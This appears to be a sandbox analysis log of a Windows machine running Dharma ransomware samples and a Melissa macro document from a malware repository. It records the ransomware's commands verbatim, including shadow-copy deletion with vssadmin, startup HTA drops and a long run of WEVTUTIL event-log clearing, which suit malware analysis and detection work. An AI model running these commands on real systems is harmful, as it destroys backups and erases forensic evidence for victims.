"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5872 /prefetch:8
2⤵
PID:856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6768 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5440
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5152
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3604
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4360
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5572
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe9c48cc40,0x7ffe9c48cc4c,0x7ffe9c48cc582⤵PID:3916
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:22⤵PID:1616
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:32⤵PID:5756
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1752,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1772 /prefetch:82⤵PID:5832
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:4232
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:12⤵PID:2772
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:12⤵PID:3632
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:82⤵PID:432
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:82⤵PID:4492
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:82⤵PID:5416
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4892 /prefetch:82⤵PID:4044
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:82⤵PID:3748
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:82⤵PID:4504
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5368 /prefetch:82⤵PID:5640
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:82⤵PID:5192
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5080,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5684 /prefetch:22⤵PID:1300
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5008,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:12⤵PID:6112
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:5344
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5856,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5960 /prefetch:82⤵PID:2204
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3264,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:12⤵PID:5916
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5984,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:12⤵PID:3436
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5548 /prefetch:82⤵PID:3176
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:82⤵PID:624
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5484,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:5044
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5964,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6060 /prefetch:12⤵PID:5160
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5320,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3500 /prefetch:12⤵PID:5468
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3368,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5624
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=240,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4460 /prefetch:12⤵PID:5460
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5152,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:2620
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5132,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:3000
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3324,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5724 /prefetch:12⤵PID:5124
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3308,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5136 /prefetch:82⤵PID:5164
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:5276
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:3708
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4712
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2068
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\*\" -ad -an -ai#7zMap1880:30696:7zEvent132811⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4868
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:5452
C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe"C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe"1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3036
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:2532
C:\Windows\system32\mode.commode con cp select=12513⤵PID:8480
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11172
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵PID:4508
C:\Windows\system32\mode.commode con cp select=12513⤵PID:8492
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6596
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:7448
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"2⤵PID:7200
C:\Users\Admin\Documents\Dharma\mssql2.exe"C:\Users\Admin\Documents\Dharma\mssql2.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3684
C:\Users\Admin\Documents\Dharma\nc123.exe"C:\Users\Admin\Documents\Dharma\nc123.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1436
C:\Users\Admin\Documents\Dharma\mssql.exe"C:\Users\Admin\Documents\Dharma\mssql.exe"1⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: LoadsDriver
- Suspicious use of SetWindowsHookEx
PID:3904
C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe"C:\Users\Admin\Documents\Dharma\EVER\SearchHost.exe"1⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6172
C:\Users\Admin\Documents\Dharma\unlocker.exe"C:\Users\Admin\Documents\Dharma\unlocker.exe"1⤵
- Executes dropped EXE
PID:6768
C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp"C:\Users\Admin\AppData\Local\Temp\is-ROG96.tmp\unlocker.tmp" /SL5="$305E4,1939817,139776,C:\Users\Admin\Documents\Dharma\unlocker.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:7752
C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe"C:\Users\Admin\Documents\Dharma\EVER\1saas\LogDelete.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:8640
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Test\Logdelete.bat" "2⤵PID:6156
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WEVTUTIL EL3⤵
- System Location Discovery: System Language Discovery
PID:7508
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL EL4⤵PID:8716
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AMSI/Debug"3⤵PID:6804
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "AirSpaceChannel"3⤵PID:6376
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Analytic"3⤵PID:7572
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Application"3⤵
- Clears Windows event logs
PID:7308
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowFilterGraph"3⤵PID:6604
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "DirectShowPluginControl"3⤵PID:12272
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Els_Hyphenation/Analytic"3⤵PID:12096
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "EndpointMapper"3⤵PID:10684
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "FirstUXPerf-Analytic"3⤵
- Clears Windows event logs
PID:8928
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "ForwardedEvents"3⤵PID:8820
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "General Logging"3⤵PID:6080
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "HardwareEvents"3⤵PID:7872
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "IHM_DebugChannel"3⤵PID:12032
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"3⤵PID:11144
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"3⤵PID:9060
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"3⤵PID:8888
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"3⤵PID:11228
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"3⤵
- Clears Windows event logs
PID:11792
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"3⤵PID:6656
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Internet Explorer"3⤵PID:3268
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Key Management Service"3⤵
- System Location Discovery: System Language Discovery
PID:9756
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationDeviceMFT"3⤵PID:9524
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationDeviceProxy"3⤵PID:6420
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MF_MediaFoundationFrameServer"3⤵PID:11040
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MedaFoundationVideoProc"3⤵PID:6548
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MedaFoundationVideoProcD3D"3⤵PID:7468
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationAsyncWrapper"3⤵PID:11216
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationContentProtection"3⤵PID:3288
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationDS"3⤵PID:11000
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationDeviceProxy"3⤵PID:10528
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationMP4"3⤵PID:8020
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationMediaEngine"3⤵PID:10800
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPerformance"3⤵PID:7232
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPerformanceCore"3⤵PID:9940
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPipeline"3⤵PID:9684
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationPlatform"3⤵PID:6164
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "MediaFoundationSrcPrefetch"3⤵PID:4236
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client-Streamingux/Debug"3⤵PID:9256
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Admin"3⤵PID:10476
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Debug"3⤵PID:6524
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Operational"3⤵PID:3332
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-Client/Virtual Applications"3⤵PID:10552
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-AppV-SharedPerformance/Analytic"3⤵
- Clears Windows event logs
PID:9732
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Admin"3⤵PID:7696
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Debug"3⤵PID:6444
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Client-Licensing-Platform/Diagnostic"3⤵PID:7356
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-IE/Diagnostic"3⤵PID:6968
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"3⤵PID:9988
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"3⤵PID:6892
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-OneCore-Setup/Analytic"3⤵PID:8532
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"3⤵PID:9908
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"3⤵PID:6756
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Admin/Debug"3⤵PID:8596
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Debug"3⤵PID:8288
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Operational"3⤵PID:5408
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Analytic"3⤵PID:8088
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Debug"3⤵PID:8696
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Operational"3⤵PID:9160
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-IPC/Operational"3⤵PID:10668
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"3⤵PID:10620
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Debug"3⤵PID:8956
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Operational"3⤵PID:11060
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AAD/Analytic"3⤵PID:9760
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AAD/Operational"3⤵PID:6932
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ADSI/Debug"3⤵PID:8468
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ASN1/Operational"3⤵PID:8920
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ATAPort/General"3⤵PID:7580
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"3⤵PID:7872
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:8604
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-All-User-Install-Agent/Admin"3⤵PID:6412
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AllJoyn/Debug"3⤵PID:6440
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AllJoyn/Operational"3⤵PID:6528
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-AppHost/Admin"3⤵PID:6680
